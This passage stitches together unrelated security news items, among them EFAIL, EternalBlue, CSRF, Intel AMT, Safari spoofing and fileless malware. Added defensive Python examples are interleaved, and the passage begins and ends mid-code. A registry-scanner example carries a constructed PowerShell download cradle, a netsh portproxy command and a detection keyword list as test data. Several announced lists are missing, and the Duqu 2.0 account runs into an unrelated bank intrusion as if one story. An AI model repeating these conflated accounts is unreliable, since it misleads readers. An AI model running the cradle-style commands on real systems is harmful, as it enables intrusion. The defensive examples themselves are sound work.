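    # Constructed sample of `kubectl version --short` output, not real cluster data.
    SAMPLE = "Client Version: v1.12.3\nServer Version: v1.12.2\n"
    tag = server_version_from_kubectl(SAMPLE)
    print(tag, "affected by CVE-2018-1002105" if is_affected(tag) else "fixed")
```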
Enigmail and GPG Tools have been patched for EFAIL. For more up-to-date information, please see EFF's Surveillance Self-Defense guides. Don't panic! But you should stop using PGP for encrypted email and switch to a different secure communications method for now. A group of researchers released a paper today that describes a new class of serious vulnerabilities in PGP (including GPG), the most popular email encryption standard. The new paper includes a proof-of-concept exploit that can allow an attacker to use the victim's own email client to decrypt previously acquired messages and return the decrypted content to the attacker without alerting the victim. The proof of concept is only one implementation of this new type of attack, and variants may follow in the coming days. Because of the straightforward nature of the proof of concept, the severity of these security vulnerabilities, the range of email clients and plugins affected, and the high level of protection that PGP users need and expect, EFF is advising PGP users to pause in their use of the tool and seek other modes of secure end-to-end communication for now. Because we are awaiting the response from the security community to the flaws highlighted in the paper, we recommend that for now you uninstall or disable your PGP email plug-in. These steps are intended as a temporary, conservative stopgap until the immediate risk of the exploit has passed and been mitigated by the wider community. There may be simpler mitigations available soon, as vendors and commentators develop narrower solutions, but this is the safest stance to take for now. Sending PGP-encrypted emails to an unpatched client also creates adverse ecosystem incentives to open incoming emails, any of which could be maliciously crafted to expose ciphertext to attackers.
While you may not be directly affected, the other participants in your encrypted conversations are likely to be. For this attack, it isn't important whether the sender or the receiver of the original secret message is targeted. This is because a PGP message is encrypted to both of their keys. At EFF, we have relied on PGP extensively, both internally and to secure much of our external-facing email communications. Because of the severity of the vulnerabilities disclosed today, we are temporarily dialing down our use of PGP for both internal and external email. Our recommendations may change as new information becomes available, and we will update this post when that happens.
EdgeWave, Inc.®, a leading provider in cybersecurity and compliance, today revealed a new malicious exploit embedded in popular URL shorteners, which are being mistaken for legitimate URLs. URL shorteners may be susceptible to this new exploit when a change to the long URL is allowed after the shortened URL is created. The malicious parties fabricate an email that appears to be a legitimate marketing email and includes the shortened URL, passing any in-transit virus scanning and potentially other spam-checking tools. "Several days ago, we detected this new exploit while performing our real-time, human analysis on spam campaigns," said Blake Tullysmith, Principal Engineer at EdgeWave. "With over 100 million URLs being shortened per day, this new exploit can potentially impact billions of users across email and social media campaigns." Here is how the EdgeWave ePrism team explains the exploit: Some URL shorteners will allow users to change the long URL after they have already created the shortened URL. The malicious parties will then fabricate a seemingly legitimate email and include a shortened URL that passes in-transit virus scanning as well as other filtering solutions, which will allow the shortened URL to be delivered right into the inbox. Once the message carrying the campaign has been delivered, the shortened URL is redirected to a site that contains malicious content like a virus or malware. However, the delivered message is already in the inbox, so unfortunately there is no protection at this point. Attached is an image of a sample email message extracted from an email campaign while in transit, with a link from http://tiny.cc pointing to a clean website. After the campaign was delivered, it pointed to a compromised website containing malicious content.
The EdgeWave team is still conducting further investigations on this exploit and recommends that all URL-shortening users utilize services that do not allow the URL to be edited after its creation. EdgeWave customers are being protected by its ePrism Email Security solution. EdgeWave ePrism is an award-winning, hosted cloud email security solution with Zero-Minute Defense against phishing, spam and malware campaigns, using our unique combination of automated intelligence and 24/7/365 human analysis in a simple-to-use security suite for all email compliance and business needs.
Sensors used to detect the level of ambient light can be used to steal browser data, according to privacy expert Lukasz Olejnik. Over the past decade, ambient light sensors have become quite common in smartphones, tablets, and laptops, where they are used to detect the level of surrounding light and automatically adjust a screen's intensity to optimize battery consumption... and other things. The sensors have become so prevalent that the World Wide Web Consortium (W3C) has developed a special API that allows websites (through a browser) to interact with a device's ambient light sensors. Browsers such as Chrome and Firefox have already shipped versions of this API with their products. Last month, in a discussion of the W3C Generic Sensor specification, the Google team proposed that ambient light sensors (ALS), together with gyroscope, magnetometer, and accelerometer sensors, should be exempt from the browser permissions system. In other words, websites using these sensors wouldn't have to ask users for explicit permission before accessing any of these four sensors. Google's opinion is that by removing this permission requirement, browsers will be on par with mobile applications, which also don't have to ask the user for permission before accessing these sensors. This proposal didn't go over well with Olejnik and fellow researcher Artur Janc, who in a series of demos have proved that light radiating from the device's screen is often picked up by the ambient light sensor. A determined attacker who can lure victims to his site, or one who can insert malicious code on another site, can determine which URLs a user has visited in the past. The whole attack relies on using different colors for normal and previously visited links, which produce a small light variation that ambient light sensors can pick up.
Furthermore, Olejnik and Janc also proved that ambient light sensors can steal QR codes, albeit this attack takes longer to perform. Right now, ambient light sensor readings are blocked in Chrome behind settings flags, as the API is experimental, but they're supported in Firefox via DeviceLight events. According to Olejnik, mitigating this attack is simple, as it only requires browser makers and the W3C to adjust the default frequency at which the sensors report their readings. Furthermore, the researcher also recommends that browser makers quantize the result by limiting the precision of the sensor output to only a few values in a preset range. Both attacks Olejnik and Janc devised take from seconds to minutes to execute. With these mitigations in place, the attacks wouldn't be stopped outright, but they would take even longer to perform, making them impractical in the real world. In the long run, Olejnik and Janc hope to see access to these sensors placed behind a dedicated browser permission. The two researchers filed bug reports with both Chrome and Firefox in the hope that their recommendations will be followed. Olejnik has previously shown how battery readouts can allow advertisers to track users online, how the new W3C Web Bluetooth API is riddled with privacy holes, and how the new W3C Proximity Sensor API allows websites and advertisers to query the position of nearby objects.
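The two mitigations described above (a lower reporting frequency and quantized output) as an added example, not code from the researchers or from any browser; the lux range, the number of output levels and the one-second minimum interval are assumed values, and the link-colour readings are constructed.

```python
"""Quantize and rate-limit ambient light readings before exposing them to page script.

Added example illustrating the two mitigations Olejnik recommends; it is not
code from the researchers or from any browser. The range, the number of
output levels and the minimum reporting interval are assumed values.
"""
from dataclasses import dataclass, field
from typing import List, Optional, Tuple


@dataclass
class LightSensorFilter:
    """Sits between the raw sensor and the web API that reports readings."""
    min_lux: float = 0.0
    max_lux: float = 1000.0      # assumed preset range
    levels: int = 8              # assumed number of distinct output values
    min_interval_s: float = 1.0  # assumed minimum time between reports
    _last_report: Optional[float] = field(default=None, init=False, repr=False)

    def quantize(self, lux: float) -> float:
        """Clamp to the preset range, then snap to one of `levels` values."""
        lux = min(max(lux, self.min_lux), self.max_lux)
        step = (self.max_lux - self.min_lux) / (self.levels - 1)
        return self.min_lux + round((lux - self.min_lux) / step) * step

    def report(self, t: float, lux: float) -> Optional[float]:
        """Return a quantized reading, or None if the last report was too recent."""
        if self._last_report is not None and t - self._last_report < self.min_interval_s:
            return None
        self._last_report = t
        return self.quantize(lux)


def filter_stream(samples: List[Tuple[float, float]], **opts) -> List[float]:
    """Run (timestamp, lux) samples through a fresh filter; keep what gets reported."""
    f = LightSensorFilter(**opts)
    return [r for r in (f.report(t, lux) for t, lux in samples) if r is not None]


def distinguishable(lux_a: float, lux_b: float, **opts) -> bool:
    """Would two raw readings still differ after quantization?

    The history-sniffing attack depends on the tiny brightness difference
    between visited and unvisited link colours surviving into the API output.
    """
    f = LightSensorFilter(**opts)
    return f.quantize(lux_a) != f.quantize(lux_b)


if __name__ == "__main__":
    # Constructed raw readings: screen lit by an unvisited vs a visited link colour.
    UNVISITED, VISITED = 312.4, 313.1
    print("raw readings distinguishable:", UNVISITED != VISITED)
    print("quantized readings distinguishable:", distinguishable(UNVISITED, VISITED))
    # Constructed 4 Hz sample stream; only one reading per second gets through.
    stream = [(i * 0.25, 300.0) for i in range(12)]
    print("reports delivered:", len(filter_stream(stream)), "of", len(stream))
```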
While combing through WikiLeaks' Vault 7 data dump, Cisco has unearthed a critical vulnerability affecting 300+ of its switches and one gateway that could be exploited to take over the devices. The flaw is present in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software. "The vulnerability is due to the combination of two factors: the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device, and the incorrect processing of malformed CMP-specific Telnet options," Cisco explained. "An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device." The extensive and complete list of affected devices is provided in the security advisory. Cisco says that it is not aware of any public announcements or active malicious use of the vulnerability, and that it will provide free software updates to address it (it doesn't say when). In the meantime, users can mitigate the risk by disabling the Telnet protocol and switching to SSH. If that's not possible, they can reduce the attack surface by implementing infrastructure access control lists. The advisory also includes indicators of compromise that can be used to detect exploitation attempts.
A flaw in unpatched versions of Windows 10 could leave machines vulnerable to EternalBlue, the remote kernel exploit behind the recent WannaCry ransomware attack. WannaCry targeted a critical Server Message Block (SMB) vulnerability that Microsoft patched with MS17-010 on March 14, 2017. While WannaCry damage was mostly limited to machines running Windows 7, a different version of EternalBlue could infect Windows 10. Researchers at RiskSense stripped the original leaked version of EternalBlue down to its essential components and deemed parts of the data unnecessary for exploitation. They found they could bypass detection rules recommended by governments and antivirus vendors, says RiskSense senior security researcher Sean Dillon. This version of EternalBlue, an exploit initially released by Shadow Brokers earlier this year, does not use the DoublePulsar payload common among other exploits leaked by the hacker group. DoublePulsar was the main implant used in WannaCry and a key focus for defenders. "That backdoor is unnecessary," says Dillon, noting how it's dangerous for businesses to focus only on DoublePulsar malware. "This exploit could directly load malware onto the system without needing to install the backdoor." EternalBlue gives instant un-credentialed remote access to Windows machines without the MS17-010 patch update. While it's difficult to port EternalBlue to additional versions of Windows, it's not impossible. Unpatched Windows 10 machines are at risk, despite the fact that Microsoft's newest OS receives exploit mitigations that earlier versions don't. The slimmed-down EternalBlue can be ported to unpatched versions of Windows 10 and deliver stealthier payloads. Advanced malware would be able to target any Windows machine, broadening the spread of an attack like WannaCry, Dillon explains.
It's worth noting WannaCry was a blatant, obvious attack, he says, and other types of malware, like banking spyware and bitcoin miners, could more easily fly under the radar. "These can infect a network and you won't know about it until years later," he says. "It's a threat to organizations that have been targets, like governments and corporations. Attackers may try to get onto these networks and lay dormant… then steal intellectual property or cause other damage." Dillon emphasizes the importance of updating to the latest version of Windows 10, but says patching alone won't give complete protection from this kind of threat. Businesses with SMB facing the Internet should also put up firewalls, and set up VPN access for users who need external access to the internal network. Businesses should have a good inventory of software and devices on their networks, along with processes for identifying and deploying patches as they are released, says Craig Young, computer security researcher for Tripwire's Vulnerability and Exposures Research Team (VERT). This will become even more critical as attackers move quickly from patch to exploit. There will always be a window of opportunity for attackers before the right patches are installed, Young notes. EternalBlue is a "very fresh vulnerability," given that most breaches that use exploits leverage flaws that have been publicly known for an average of two years or more. "EternalBlue is a particularly reliable exploit that gives access to execute code at the very highest privilege level, so I would expect that hackers and penetration testers will get a lot of use out of it for years to come," he says.
A decade ago, cross-site request forgery (CSRF, often pronounced "c-surf") was considered to be a sleeping giant, preparing to wake and inflict havoc on the Worldwide Web. But the doomsday scenario never materialized, and you don't even seem to hear much about it anymore. In this blog post, part 1 of 2, I will explore this idea and try to understand why the CSRF giant never awoke. First we'll cover the overall threat landscape, trends, and some notable CSRF exploits throughout the years, including one from personal experience. As a quick review, CSRF exists because web applications trust the cookies sent by web browsers within an HTTP request. In a CSRF attack, the attacker causes a victim's browser to make a request that results in a change or action which benefits the attacker (and/or harms the victim) in some way. Without a specific defense, like a random token in the request body that is validated on the server side, CSRF attacks are possible. After a bit of testing, my suspicions were confirmed. All requests that caused any sort of change could be exploited with CSRF. This included: I contacted the company to let them know about these security holes. Surprisingly, they didn't seem to be aware there was such a thing as CSRF, but they thanked me anyway and rolled out a fix about a month later. There have been other notable instances of CSRF vulnerabilities, with some of them being exploited in the wild. Drive-by pharming is an attack on the DNS settings of home routers and modems, and it often leverages CSRF as a key element. The web UIs on these devices are the culprit, because they allow users to edit configuration settings. In one attack from 2008, banking customers in Mexico who owned 2Wire DSL modems were targeted.
Victims received an email with an embedded image tag carrying a CSRF attack that changed the DNS settings on their modem. In another instance, tens of thousands of Twitter users fell victim to a CSRF worm in 2010 when developers failed to implement anti-CSRF measures for tweets. The vulnerability was discovered and exploited in a rather distasteful but harmless way. When authenticated Twitter users visited the web page containing the exploit, they unknowingly posted two tweets: one with a link to the same page and another with a message about goats. Anyone who clicked on the link in the first tweet also posted the same two tweets. The worm spread like wildfire before it was fixed by Twitter. In 2012 Facebook's App Center was vulnerable to CSRF, and the security researcher who discovered the flaw was awarded $5000 as a bounty. Interestingly, in this case the HTTP request included an anti-CSRF token that appeared at first glance to provide protection, but the token was not being validated by the server-side application when the request was received. A Qualys researcher found other examples where anti-CSRF tokens were not properly validated. And similar to the Facebook issue mentioned above, PayPal in 2016 did not validate the anti-CSRF token in paypal.me. An attacker could only change a user's profile photo in that case, however.
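The defense the post describes (a random per-session token validated server-side) beside the App Center and paypal.me mistake of carrying a token that is never checked, as an added example that is not code from the post or from any of the sites it names; the Session and Request classes stand in for a web framework, and the email-change endpoint is hypothetical.

```python
"""Synchronizer-token CSRF protection, and the 'token present but never checked' flaw.

Added example; not code from the blog post or from any of the sites it names.
Session and Request are stand-ins for a real web framework's objects, and
the email-change action is a hypothetical state-changing endpoint.
"""
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional

# Server-side state the endpoint modifies (constructed for the example).
ACCOUNTS: Dict[str, str] = {"alice": "alice@example.com"}


@dataclass
class Session:
    """Server-side session, found via the session cookie the browser attaches
    automatically; that automatic attachment is what CSRF abuses."""
    user: str
    csrf_token: Optional[str] = None


@dataclass
class Request:
    """What the endpoint sees: the cookie-resolved session plus the form body."""
    session: Session
    form: Dict[str, str] = field(default_factory=dict)


def issue_token(session: Session) -> str:
    """Create one unguessable token per session and embed it in the site's forms."""
    if session.csrf_token is None:
        session.csrf_token = secrets.token_urlsafe(32)
    return session.csrf_token


def token_is_valid(session: Session, submitted: Optional[str]) -> bool:
    """Constant-time check of the submitted token against the session's token."""
    expected = session.csrf_token
    if expected is None or submitted is None:
        return False
    return hmac.compare_digest(expected.encode(), submitted.encode())


def change_email_unvalidated(req: Request, new_email: str) -> bool:
    """The App Center / paypal.me mistake: the request carries a csrf_token
    field, so the traffic looks protected, but nothing compares it to the
    session, and a cross-site form post with any (or no) token goes through."""
    _unused = req.form.get("csrf_token")  # read, then ignored
    ACCOUNTS[req.session.user] = new_email
    return True


def change_email_protected(req: Request, new_email: str) -> bool:
    """Same action, but the token is validated before any state changes."""
    if not token_is_valid(req.session, req.form.get("csrf_token")):
        return False
    ACCOUNTS[req.session.user] = new_email
    return True


if __name__ == "__main__":
    alice = Session(user="alice")
    token = issue_token(alice)  # rendered into alice's own forms
    # A form auto-submitted from an attacker's page: alice's cookie rides
    # along, so the session resolves, but the attacker cannot know `token`.
    forged = Request(alice, {"csrf_token": "guess"})
    print("unvalidated endpoint accepted forgery:",
          change_email_unvalidated(forged, "x@example.net"))
    print("protected endpoint accepted forgery:",
          change_email_protected(forged, "x@example.net"))
    legit = Request(alice, {"csrf_token": token})
    print("protected endpoint accepted legitimate post:",
          change_email_protected(legit, "new@example.com"))
```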
In an email sent to users on 26th December, the site explained that hackers were able to conduct this breach by exploiting a known vulnerability in outdated vBulletin forum software. Although PakWheels didn't reveal the number of affected users, we at HackRead have inside details on this breach, according to which the number of users impacted goes over 674,775, with names, emails, encrypted passwords, mobile numbers and Facebook sessions exposed. PakWheels was started back in 2003 to fill the gap between automotive enthusiasts and the absence of a platform discussing automotive-industry topics in the country. In May 2016, Pakistan's real estate giant Zameen was hacked by a Bangladeshi hacker who leaked its entire database after being ignored by Zameen's administration. As far as vBulletin forum software goes, 2016 has been a bad year for anyone using vBulletin and not updating it to its latest version. Until now, the forums hacked due to the vulnerability in outdated vBulletin forum software include the Clash of Kings forum with 1.6 million records stolen, the Epic Games forum with 800,000 accounts stolen, the Grand Theft Auto (GTA) forum, Russia's Mail.ru with 27 million accounts stolen, the LifeBoat forum with 7 million accounts stolen and the Exile Mod gaming forum with 12,000 accounts stolen.
A security vulnerability in Intel Corp. chips first disclosed last week looks far worse than initially thought, as hackers can hijack Intel processors without even needing a password. The vulnerability, which affects all Intel chips manufactured since 2008, from those code-named Nehalem to today's Kaby Lake, stems from a flaw in the vPro firmware suite, including Intel Active Management Technology from versions 6 to 11.6. The security hole allows an unprivileged attacker to gain control of the manageability features provided by the firmware suite, giving a would-be hacker the same access that a systems administrator would have, including the ability to change boot-up code and access the computer's mouse, keyboard, monitor and installed programs. Intel argued that access to the vulnerability was fairly limited, in that a password was required to access AMT. But Tenable Network Security Inc. has discovered that the verification process for AMT accepts a blank password submission. As Rick Falkvinge at Private Internet Access explains: "In order to get administrator privileges to the server memory, all you needed to do was to submit a blank password field instead of the expected privileged-access password hash, and you would have unlimited and unlogged read/write access to the entire server memory." With gaining access to an Intel central processing unit as simple as submitting no password, experts are warning that the worst should be presumed. "If you have anything connected to the Internet with AMT on, disable it now. Assume the server has already been compromised," SSH inventor Tatu Ylonen said in a blog post. "The exploit is trivial, a maximum of five lines of Python, and could be doable in a one-line shell command."
He said the flaw gives full control of affected machines, including the ability to read and modify everything. "It can be used to install persistent malware – possibly in the firmware – and read and modify any data." Ylonen recommended that AMT be disabled today and that affected users "mobilize whomever you need." More specifically, he said, "start from the most critical servers: Active Directory, certificate authorities, critical databases, code signing servers, firewalls, security servers, HSMs (if they have it enabled)." Data center operators should "block ports 16992, 16993, 16994, 16995, 623, 664 in internal firewalls" if they can.
Some medical devices, smartphones and internet of things gadgets contain certain types of sensors that are vulnerable to potential hacking using sound waves, says cybersecurity researcher Kevin Fu. "This is now a risk that all manufacturers should be aware of, and in their hazard analysis, it has to be a part of their cybersecurity risk management," says Fu, explaining findings of a recent research study conducted by the University of Michigan and the University of South Carolina. The microelectromechanical systems, or MEMS accelerometers, that the research team found to contain these vulnerabilities are sensors used in various devices to measure acceleration or velocity and then report those readings to a microprocessor. "What we looked at was the ability to trick these sensors into delivering false readings to the microprocessor by using sound waves," he says in an interview with Information Security Media Group. "What medical devices contain these sensors is still an open question." The main hazard of this sound wave vulnerability is the threat to the integrity and availability of the sensor, he explains. Prior studies by other researchers had found that sound waves can be used to disable these sensors. "What's new here is that it is now known that one can actually damage the integrity of the reading," he says. "If you were trusting this reading to do something automated, such as rate-adapt a pacemaker, perhaps based on changing activity of a patient, you now need a second way to verify the integrity of that reading." The study lists 20 accelerometers for which the researchers were able to change the output of the sensors using sound waves, Fu says.
"In some devices, we found that there is a speaker built in right next to the sensor, which means there is a remote ability to cause these changes without an adversary being near the chip." Fu recommends that manufacturers assess the researchers' list of accelerometers that contain the sound wave vulnerability "and ask [suppliers] for specific parameters, including the resonant frequencies, to understand the risks and mitigations."
The big security issue of the week is a remote code execution hole related to the Cisco WebEx service. WebEx is a popular collaboration tool for online events such as meetings, webinars and videoconferences. Like many services of this sort, you access online events via your browser, augmented by a special-purpose browser extension. Browser extensions and plugins allow web developers to extend the software features inside your browser with a mixture of scripts and program code, for example to add configuration options or to support new audio and video formats. Of course, when you add another layer of programmatic complexity on top of an already-complex browser, it's easy to add new security holes, too. Perhaps the best known example of a problematic plugin is Adobe Flash, which has provided cybercrooks with such a fruitful source of exploitable security holes over the years that we have long been urging you to try to live without Flash altogether. The latest security scare of this sort has been dubbed CVE-2017-3823, and it applies to Cisco's special-purpose WebEx browser extension. In other words, if your organisation uses WebEx, you probably have the browser extension installed, and if you have it installed, you may be at risk. According to Tavis Ormandy at Google's Project Zero, who discovered and documented the bug, there are more than 20 million WebEx users worldwide. According to Cisco, Internet Explorer, Chrome and Firefox on Windows are affected. Microsoft Edge on Windows and all browsers on Mac and Linux are safe. The most recent update for Chrome is Cisco WebEx extension 1.0.7. Cisco published a notification about this update at 2017-01-26T19:45Z, having issued and then withdrawn 1.0.3 and then 1.0.5 earlier this week after deeming them "incomplete".
However, at 2017-01-26T19:45Z, Cisco's official Security Advisory page says: Cisco is currently developing updates that address this vulnerability for Firefox and Internet Explorer. There are no workarounds that address this vulnerability. Using Microsoft Edge on Windows or any browser on Mac or Linux will shield you from this bug because it doesn't apply on those platforms. You can also turn off WebEx support in your browser temporarily, thus preventing the Cisco extension or add-on from activating unexpectedly.
Discovered by a security researcher who goes by the name of Zenofex, these security flaws have not been reported to Western Digital, are still unpatched, and public exploit code is available for more than half of the vulnerabilities. According to Zenofex, multiple WD MyCloud NAS device models are affected, such as: Zenofex's decision not to inform Western Digital came after the researcher attended a security conference last year, where other infosec professionals complained about Western Digital ignoring vulnerability reports. It was at the same conference, Black Hat USA 2016, where Western Digital also won a Pwnie Award in a category called "Lamest Vendor Response." "Ignoring these bugs would leave the vulnerable devices online for longer periods while responsible disclosure is worked out," Zenofex said, explaining his decision not to wait until Western Digital patches the security bugs. "Instead we're attempting to alert the community of the flaws and hoping that users remove their devices from any public facing portions of their networks, limiting access wherever possible," he added. Zenofex, who's a member of the Exploitee.rs community, says he found a whopping total of 85 security issues. Based on the exploit code, many of these security flaws can be exploited by altering cookie values or embedding shell commands in cookie parameters. When the image loads inside their browser, the exploit code executes against the local NAS drive and takes over the device.
The most severe of these issues, according to Zenofex, is an authentication bypass issue, which ironically was also the easiest to exploit, requiring only the modification of cookie session parameters. And since Murphy's Law applies to hardware devices as well, things went wrong all the way, and the commands aren't executed under a limited user but run under root, giving attackers full control over affected devices, allowing them to upload or download data at will.
A flaw in Safari – that allows an attacker to spoof websites and trick victims into handing over their credentials – has yet to be patched. A browser address bar spoofing flaw was found by researchers this week in Safari – and Apple has yet to issue a patch for the flaw. Researcher Rafay Baloch on Monday disclosed two proof-of-concepts revealing how vulnerabilities in Edge browser 42.17134.1.0 and Safari iOS 11.3.1 could be abused to manipulate the browsers' address bars, tricking victims into thinking they are visiting a legitimate website. Baloch told Threatpost Wednesday that Apple has promised to fix the flaw in its next security update for Safari. "Apple has told [me] that the latest beta of iOS 12 also addresses the issue, however they haven't provided any dates," he said. Apple did not respond to multiple requests for comment from Threatpost. Microsoft for its part has fixed the vulnerability Baloch found in the Edge browser (CVE-2018-8383) in its August Patch Tuesday release. According to Microsoft's vulnerability advisory released August 14, the spoofing flaw exists because Edge does not properly parse HTTP content. Both flaws stem from the Edge and Safari browsers allowing JavaScript to update the address bar while the page is still loading. This means that an attacker could request data from a non-existent port and, due to the delay induced by the setInterval function, trigger the address bar spoofing.
The browser would then preserve the address bar and load the content from the spoofed page, Baloch said in his blog breaking down both vulnerabilities. From there, the attacker could spoof the website, using it to lure in victims and potentially gather credentials or spread malware. For instance, the attacker could send an email message containing the specially crafted URL to the user, convince the user to click it, and take them to the link which could gather their credentials or sensitive information. "As per Google, the address bar is the only reliable indicator for ensuring the identity of the website; if the address bar points to Facebook.com and the content is hosted on the attacker's website, there is no reason why someone would not fall for this," Baloch told Threatpost. In a video demonstration, Baloch showed how he could visit a link for the vulnerable browser on Edge (http://sh3ifu[.]com/bt/Edge-Spoof.html), which would take him to a site purporting to be a Gmail login. However, while the URL points to a Gmail address, the content is hosted on sh3ifu.com, said Baloch. The Safari proof-of-concept is similar, except for one constraint where it does not allow users to type their information into the input boxes while the page is in a loading state. However, Baloch said he was able to circumvent this restriction by injecting a fake keyboard using JavaScript – a common practice in banking sites. No other browsers – including Chrome or Firefox – were discovered to have the flaw, said Baloch. Baloch is known for discovering similar vulnerabilities in Chrome, Firefox and other major browsers in 2016, which also allowed attackers to spoof URLs in the address bar.
The vulnerabilities were disclosed to both Microsoft and Apple, and Baloch gave both a 90-day deadline before he went public with the flaws. Due to the Safari browser bug being unpatched, Baloch said he has not yet released a proof of concept: "However, considering there is a slight difference between the Edge browser POC and Safari, anyone with decent knowledge of JavaScript can make it work on Safari," he told us.
Two years ago, researchers at Moscow-based Kaspersky Lab discovered their corporate network was infected with malware that was unlike anything they had ever seen. Virtually all of the malware resided solely in the memory of the compromised computers, a feat that had allowed the infection to remain undetected for six months or more. Kaspersky eventually unearthed evidence that Duqu 2.0, as the never-before-seen malware was dubbed, was derived from Stuxnet, the highly sophisticated computer worm reportedly created by the US and Israel to sabotage Iran's nuclear program. The Kaspersky Lab researchers still don't know if a single group of individuals is behind the attacks, or if they're being carried out by competing hacker gangs. The use of the fileless malware and command-server domains that aren't associated with any whois data makes the already difficult task of attribution almost impossible. The researchers first discovered the malware late last year, when a bank's security team found a copy of Meterpreter—an in-memory component of Metasploit—residing inside the physical memory of a Microsoft domain controller. After conducting a forensic analysis, the researchers found that the Meterpreter code was downloaded and injected into memory using PowerShell commands. The infected machine also used Microsoft's NETSH networking tool to transport data to attacker-controlled servers. To obtain the administrative privileges necessary to do these things, the attackers also relied on Mimikatz. To reduce the evidence left in logs or hard drives, the attackers stashed the PowerShell commands into the Windows registry. Fortunately, the evidence on the domain controller was intact, presumably because it hadn't been restarted before Kaspersky Lab researchers began their investigation.
An analysis of the dumped memory contents and the Windows registries allowed the researchers to restore the Meterpreter and Mimikatz code. The attackers, the researchers later determined, had used the tools to collect passwords of system administrators and for the remote administration of infected host machines.
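The registry-resident PowerShell described above is also what a defender goes looking for. The following is an added example, not code from Kaspersky Lab or from this article: a Python scanner that walks a `.reg` export, decodes any `-EncodedCommand` payload (PowerShell takes base64 of UTF-16LE text) and flags values that carry PowerShell, download-cradle or netsh tokens. The keyword list, the key path, the value names and the encoded script are all constructed for the example and are assumptions, not indicators from the investigation.

```python
import base64
import re
from typing import Dict, List, Optional

# Tokens that mark a registry value as worth a closer look. The list is this
# example's own assumption, not a detection rule from Kaspersky Lab.
SUSPICIOUS = re.compile(
    r"powershell|pwsh|-enc(?:odedcommand)?\b|-w(?:indowstyle)?\s+hidden|-nop\b|"
    r"\biex\b|invoke-expression|downloadstring|frombase64string|\bnetsh\b|portproxy",
    re.IGNORECASE,
)
# -e / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_ARG = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)
KEY_LINE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
VALUE_LINE = re.compile(r'^"(?P<name>[^"]+)"=(?P<raw>.+)$')

# Constructed sample: the command text the encoded value carries and a fake
# .reg export of a Run key. None of this is taken from the Kaspersky report.
CONSTRUCTED_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/')"
ENCODED = base64.b64encode(CONSTRUCTED_SCRIPT.encode("utf-16-le")).decode("ascii")

SAMPLE_REG = f"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]
"ExampleUpdater"="\\"C:\\\\Program Files\\\\Example\\\\updater.exe\\" /background"
"UpdaterSvc"="powershell.exe -nop -w hidden -enc {ENCODED}"
"NetCfg"="cmd.exe /c netsh interface portproxy add v4tov4 listenport=8080 connectaddress=203.0.113.10 connectport=443"
"""


def unescape_reg_string(raw: str) -> Optional[str]:
    """Turn a .reg string literal ("..." with \\\\ and \\" escapes) into its value.
    Non-string data (dword:, hex:) returns None; it is out of scope here."""
    if len(raw) < 2 or raw[0] != '"' or raw[-1] != '"':
        return None
    return re.sub(r"\\(.)", r"\1", raw[1:-1])


def decode_encoded_command(value: str) -> Optional[str]:
    """PowerShell -EncodedCommand takes base64 of UTF-16LE; recover the script text."""
    m = ENCODED_ARG.search(value)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_reg_export(text: str) -> List[Dict[str, object]]:
    """Walk a .reg export and return the values carrying suspicious tokens,
    checking the decoded -EncodedCommand payload as well as the raw value."""
    findings: List[Dict[str, object]] = []
    key = ""
    for line in text.splitlines():
        line = line.strip()
        km = KEY_LINE.match(line)
        if km:
            key = km.group("key")
            continue
        vm = VALUE_LINE.match(line)
        if not vm:
            continue
        value = unescape_reg_string(vm.group("raw"))
        if value is None:
            continue
        decoded = decode_encoded_command(value)
        haystack = value + ("\n" + decoded if decoded else "")
        reasons = sorted({m.group(0).lower() for m in SUSPICIOUS.finditer(haystack)})
        if reasons:
            findings.append({"key": key, "name": vm.group("name"), "value": value,
                             "decoded": decoded, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_reg_export(SAMPLE_REG):
        print(f'{f["key"]}\\{f["name"]}: {f["reasons"]}')
        if f["decoded"]:
            print("   decoded:", f["decoded"])
```

The decode step is the part that matters: a value that is only `powershell -enc <blob>` carries no readable keyword until the blob is turned back into text, which is why keyword matching on the raw value alone misses the download cradle. Exporting the Run keys and the other autostart locations from a suspect host and feeding them through this is a cheap triage pass; it does not replace memory analysis of the kind the researchers had to do.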
Trade-off between security and usability unlikely to permit systematic surveillance, experts say
• This article was originally published on 13 January 2017. It has been extensively amended (see endnotes) following a review by the Guardian's readers' editor.
A design feature that could potentially allow some encrypted messages to reach unintended recipients is present within the WhatsApp messaging service. Facebook-owned WhatsApp, which has about one billion users, has not made it widely known that there is an aspect of WhatsApp that results in some messages being re-encrypted and resent automatically, without first giving the sender an opportunity to verify the recipient. Campaigners have expressed concern about how this aspect of WhatsApp could potentially be exploited to conduct surveillance. WhatsApp has made privacy and security a primary selling point, and has become a go-to communications tool of activists, dissidents and diplomats. Its end-to-end encryption relies on the generation of unique security keys using the acclaimed Signal protocol, developed by Open Whisper Systems. Keys are exchanged between users to guarantee communications are secure from interception by middlemen. The way WhatsApp implemented the protocol, new keys are generated when – for example – a user gets a new phone or reinstalls the app. Messages for the user which may have been waiting to be delivered while the user was offline are then re-encrypted and resent by the sender automatically, without the sender having had an opportunity to verify that the recipient is the person intended to receive the message. A sender is notified after the event if the sender has opted to turn on a notification in settings, but not otherwise.
This aspect of WhatsApp, which increases convenience and reliability of message delivery at the cost of some security, is not inherent to the Signal protocol. Without it, if a recipient's security key changes while they are offline, an in-transit message fails to be delivered and the sender is notified of the change in security keys, without the message having been resent automatically.
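To make the trade-off concrete, here is an added toy model of the two delivery policies the article contrasts. It is not WhatsApp's or Signal's code and implements no cryptography: a key is just an identifier, and "re-encrypt" means binding the queued message to the recipient's current key. The policy names `auto_resend` and `block_and_notify`, the `SenderClient` class and the Alice/Bob scenario are this example's own.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Tuple


@dataclass
class PendingMessage:
    to: str
    body: str
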